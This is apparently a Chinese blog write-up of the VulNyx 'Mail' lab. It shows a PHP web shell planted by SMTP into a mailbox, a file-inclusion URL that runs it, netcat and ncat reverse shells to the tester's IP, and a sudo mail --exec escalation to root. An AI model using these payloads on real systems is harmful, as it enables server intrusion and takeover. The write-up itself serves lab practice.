靶场练习-vulnyx：Mail - Medium - VulNyx - 靶场练习 | 🎐清风. = 劈开深海，填入我的山🍂

# 靶场搭建

下载：Mail

Nat，IP： 192.168.1.165

	PORT STATE SERVICE VERSION
	22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
	\| ssh-hostkey:
	\| 3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
	\| 256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
	\|_ 256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
	25/tcp open smtp Postfix smtpd
	\| ssl-cert: Subject: commonName=mail
	\| Subject Alternative Name: DNS:mail
	\| Not valid before: 2023-05-13T14:36:50
	\|_Not valid after: 2033-05-10T14:36:50
	\|_smtp-commands: mail.home, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
	\|_ssl-date: TLS randomness does not represent time
	80/tcp open http Apache httpd 2.4.56 ((Debian))
	\|_http-title: Email Reader
	\|_http-server-header: Apache/2.4.56 (Debian)

web 服务能搜索邮件，id 1 2 已经发现有两个用户，我们发个邮件过去

	┌──(root㉿kali)-[~]
	└─# telnet 192.168.1.165 25
	Trying 192.168.1.165...
	Connected to 192.168.1.165.
	Escape character is '^]'.
	220 mail.home ESMTP Postfix (Debian/GNU)
	MAIL FROM: <[email protected]>
	250 2.1.0 Ok
	RCPT TO: <[email protected]>
	250 2.1.5 Ok
	DATA
	354 End data with <CR><LF>.<CR><LF>
	<?php system($_GET['cmd']); ?>
	FUCK U
	.
	250 2.0.0 Ok: queued as CAF85620

然后文件包含一下邮件： http://192.168.1.165/emailreader.php?id=/var/mail/cain

可读取，直接弹 shell 来： http://192.168.1.165/emailreader.php?id=/var/mail/cain&cmd=nc%20-e%20/bin/sh%20192.168.1.129%204444

拿到了 shell

sudo -u abel mail --exec='!/bin/bash' 拿到 abel 权限

sudo -l 发现可以使用 ncat 连接 ipv6，直接弹 shell： sudo ncat -6 fe80::20c:29ff:fe68:7634%ens33 6666 -e /bin/bash

拿下 root 权限